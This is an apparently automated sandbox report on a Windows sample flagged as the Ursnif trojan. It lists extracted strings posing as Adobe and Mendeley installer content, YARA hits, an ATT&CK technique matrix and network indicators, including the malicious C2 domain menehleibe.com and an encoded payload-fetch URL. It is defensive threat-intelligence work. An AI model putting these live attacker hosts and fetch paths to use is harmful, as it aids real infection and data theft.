Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
Source: cd.exe	Binary or memory string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev

Source: C:\Users\user\Desktop\cd.exe

Code function: 1_2_00401342 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

Source: Yara match

File source: cd.exe, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection2	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection2	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cd.exe	60%	ReversingLabs	Win32.Trojan.Ursnif
cd.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.cd.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File
1.3.cd.exe.82998c.0.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.broofa.com	0%	URL Reputation	safe
https://www.google.co.uk/intl/en/about/products	0%	URL Reputation	safe
https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0	0%	Avira URL Cloud	safe
https://rrchnm.org/	0%	Avira URL Cloud	safe
http://menehleibe.com/images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi	0%	Avira URL Cloud	safe
http://www.sysinternals.comWindowPositionSOFTWARE	0%	Avira URL Cloud	safe
http://ww9.menehleibe.com/	0%	Avira URL Cloud	safe
https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikey	0%	Avira URL Cloud	safe
https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDirec	0%	Avira URL Cloud	safe
http://www.sysinternals.comopenFolder	0%	Avira URL Cloud	safe
https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot	0%	Avira URL Cloud	safe
http://menehleibe.com/	0%	Avira URL Cloud	safe
https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com	0%	Avira URL Cloud	safe
https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2	0%	Avira URL Cloud	safe
https://gertrk.com/favicon.ico	0%	Avira URL Cloud	safe
http://www.sysinternals.comopenConnection	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.sysinternals.comFileVersionLegalCopyright	0%	Avira URL Cloud	safe
http://menehleibe.com/Root	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	142.250.203.110	true	false	high
menehleibe.com	173.239.8.164	true	true	unknown
www.google.com	142.250.102.106	true	false	high
mybetterdl.com	173.192.101.24	true	false	unknown
gertrk.com	168.119.139.96	true	false	unknown
p226681.mybetterdl.com	173.192.101.24	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://google.com/	false		high
https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0	false	Avira URL Cloud: safe	unknown
http://menehleibe.com/images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi	true	Avira URL Cloud: safe	unknown
http://menehleibe.com/	true	Avira URL Cloud: safe	unknown
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.png	false		high
https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com	false	Avira URL Cloud: safe	unknown
https://www.google.com/?gws_rd=ssl	false		high
https://www.google.com/gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false	false		high
https://gertrk.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png	false		high
http://www.google.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.zotero.org/	cd.exe	false		high
https://ims-prod06.adobelogin.com	cd.exe	false		high
https://policies.google.com/privacy?hl=en-GB&fg=1&utm_source=ucbs	LM1X3BMT.htm.9.dr	false		high
https://ogs.google.com/widget/app/so?bc=1	LM1X3BMT.htm.9.dr	false		high
https://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-website	cd.exe	false		high
http://www.broofa.com	rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	false	URL Reputation: safe	unknown
https://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQ	cd.exe	false		high
https://accounts.google.com/ServiceLogin?hl	LM1X3BMT.htm.9.dr	false		high
https://crashpad.chromium.org/bug/new	cd.exe	false		high
https://www.gmu.edu/	cd.exe	false		high
https://www.google.co.uk/intl/en/about/products	LM1X3BMT.htm.9.dr	false	URL Reputation: safe	unknown
https://www.google.com/index.php?url_bnm_redirect=http://google.com/?gws_rd=ssl_bnm_redirect=http://	{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	false		high
http://www.sysinternals.com	cd.exe	false		high
https://www.google.com/log?format=json&hasfast=true	rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	false		high
http://www.amazon.com/	msapplication.xml.7.dr	false		high
https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite	cd.exe	false		high
https://www.virustotal.com/about/terms-of-service%s	cd.exe	false		high
http://google.com	~DFFAD0E470126C2D77.TMP.7.dr, index[1].htm.9.dr	false		high
http://www.twitter.com/	msapplication.xml5.7.dr	false		high
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	cd.exe	false		high
https://rrchnm.org/	cd.exe	false	Avira URL Cloud: safe	unknown
https://artsandculture.google.com/partner/museo-reina-sofia	LM1X3BMT.htm.9.dr	false		high
http://schema.org/WebPage	LM1X3BMT.htm.9.dr	false		high
https://www.elsevier.com/legal/elsevier-website-terms-and-conditions	cd.exe	false		high
https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides	cd.exe	false		high
https://clients2.google.com/service/update2/crxupdate_urlBrowser	cd.exe	false		high
https://github.com/Juris-M/citeproc-js	cd.exe	false		high
http://www.sysinternals.comWindowPositionSOFTWARE	cd.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com	LM1X3BMT.htm.9.dr	false		high
http://ww9.menehleibe.com/	1G7O03DV.htm.9.dr	false	Avira URL Cloud: safe	unknown
https://consent.google.com/s?continue	LM1X3BMT.htm.9.dr	false		high
https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-I	cd.exe	false		high
https://plasma.kde.org	cd.exe	false		high
https://ogs.google.com/widget/callout?prid=19025503	LM1X3BMT.htm.9.dr	false		high
https://consent.google.com/d?continue	LM1X3BMT.htm.9.dr	false		high
https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com/?gws_rd=ssl	{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	false		high
https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikey	cd.exe	false	Avira URL Cloud: safe	unknown
https://donate.google.com/checkout?campaignid%3D6420545008435200	LM1X3BMT.htm.9.dr	false		high
https://adservice.google.com/adsid/google/ui	LM1X3BMT.htm.9.dr	false		high
https://trends.google.com/hottrends	LM1X3BMT.htm.9.dr	false		high
https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDirec	cd.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKW	LM1X3BMT.htm.9.dr	false		high
https://apis.google.com	LM1X3BMT.htm.9.dr, rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	false		high
http://www.sysinternals.comopenFolder	cd.exe	false	Avira URL Cloud: safe	unknown
https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot	{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	false	Avira URL Cloud: safe	unknown
https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding	cd.exe	false		high
http://www.reddit.com/	msapplication.xml4.7.dr	false		high
https://service.elsevier.com/app/answers/detail/a_id/22094/kw/migrate/supporthub/mendeley/	cd.exe	false		high
https://www.google.com/?gws_rd%3Dssl	LM1X3BMT.htm.9.dr	false		high
https://crashpad.chromium.org/	cd.exe	false		high
http://www.nytimes.com/	msapplication.xml3.7.dr	false		high
https://ims-na1-stg1.adobelogin.com	cd.exe	false		high
https://policies.google.com/terms?hl=en-GB&fg=1&utm_source=ucbs	LM1X3BMT.htm.9.dr	false		high
https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2	d4a6d4bd[1].htm.9.dr	false	Avira URL Cloud: safe	unknown
https://service.elsevier.com/app/answers/detail/a_id/19601/kw/connectivity/supporthub/mendeley/1setU	cd.exe	false		high
https://www.google.com/_/og/promos/	LM1X3BMT.htm.9.dr	false		high
https://csl.mendeley.com	cd.exe	false		high
http://support.mendeley.com/customer/portal/articles/227955	cd.exe	false		high
https://www.elsevier.com/legal/privacy-policy	cd.exe	false		high
https://www.google.com/search?gws_rd%3Dssl%26q%3Dnebulae%26um%3D1%26ie%3DUTF-8%26tbm%3Disch%26csf%3D	LM1X3BMT.htm.9.dr	false		high
http://agoogleaday.com/%23date%3D2011-06-04	LM1X3BMT.htm.9.dr	false		high
http://creativecommons.org/licenses/by-sa/3.0/	cd.exe	false		high
https://service.elsevier.com/app/answers/detail/a_id/19611/kw/duplicates/supporthub/mendeley/Yes	cd.exe	false		high
http://p.yusukekamiyamane.com/	cd.exe	false		high
https://play.google.com/log?format=json&hasfast=true	rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	false		high
https://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contac	cd.exe	false		high
https://www.mendeley.com/library	cd.exe	false		high
https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com	cd.exe	false		high
http://citationstyles.org/	cd.exe	false		high
https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com	~DFFAD0E470126C2D77.TMP.7.dr	false		high
http://www.sysinternals.comopenConnection	cd.exe	false	Avira URL Cloud: safe	unknown
http://www.youtube.com/	msapplication.xml7.7.dr	false		high
https://github.com/citation-style-language/styles	cd.exe	false		high
http://www.wikipedia.com/	msapplication.xml6.7.dr	false	URL Reputation: safe	unknown
http://www.live.com/	msapplication.xml2.7.dr	false		high
http://www.sysinternals.comFileVersionLegalCopyright	cd.exe	false	Avira URL Cloud: safe	unknown
https://citationstyles.org	cd.exe	false		high
http://menehleibe.com/Root	{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
173.192.101.24	mybetterdl.com	United States	36351	SOFTLAYERUS	false
173.239.8.164	menehleibe.com	United States	27257	WEBAIR-INTERNETUS	true
142.250.102.106	www.google.com	United States	15169	GOOGLEUS	false
142.250.203.110	google.com	United States	15169	GOOGLEUS	false
168.119.139.96	gertrk.com	Germany	24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483177
Start date:	14.09.2021
Start time:	16:01:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	cd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@4/27@6/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 46.1% (good quality ratio 43.4%) Quality average: 71.3% Quality standard deviation: 30.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 23.203.80.193, 172.217.168.67, 20.54.110.249, 40.112.88.60, 152.199.19.161, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, www.gstatic.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/483177/sample/cd.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
173.192.101.24	bd.exe	Get hash	malicious	Browse	beta.infopicked.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtmWx-JgfNp8fkdmcFZuMS2bN6VPfgxnTojhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57AionTQ8bleb&ui=PmRMc57CnhZmet5WPylI9zrmsYRj0uaPIWm6xrw_nb0SEtJxK6jg1-R2ZwVm4xLZE0b7pS83W6Yas2zgiGSg85AisrUbUMiRcioqsL61NR4CN7TWsk0wBvY9u5-NhtU4&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=9IwXRgUAF1M&rr=1
	http://googledrive-eu.com	Get hash	malicious	Browse	p277439.infopicked.com/adServe/domainClick?ai=wTeBxKdiv_bj6z-4DR5E65Om8Nyxc9lLgDRCoHPU9NBicoOwyuqkHX7tQ5ixhcbdO43wquhAS6JPCleYyIgbBD8dxhdEmIryMx2af8Hv1J4PdhGn3_C1PnzMxTSW33E-llpg4FhZfxSND2YfpRIsxCN5ECptO-en_TtBhjTW1e4N8EoRnnpLDGJWdAgaDFAOJTu6AXYz7K5cexTb7nMLvihXId0SfCJtlz2vc8v2BfZTSkSKGXDcd1kMKtaMbp0webbtBQaatSvVCW9UoLTzK2_T5x_FGAdpIKKNlj9I1Bp0zkQJR4Qsl-RCaNkT3qyOnwM9sZtI20k3QkkpNB0KG6OIZhD5UZ8zUEpDz_87JciBp9n2wO8e3QXL0tt9b_p24Wg6c98G2nieKTEQPOdaBRbRh5WhN0Axej_wmAiUbeoWBGu3Yx722HW3MQ4Jbibrdzc61NAyifxeMfd4XJSYEmWSQsQHXjql&ui=PmRMc57CnhbRNq-TBmz5rmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FlOVRgiHRE-gWcczllSM9qgw3K_Z4UCDYDvbCD0sgkK00pnF-XkSy14jdvC7dnR3QuDXAcvgtM3N&si=1&oref=d3c2837da0e02e3a4a67f0afabcb8712&rb=l5kJ6TEqV6Y&rr=1
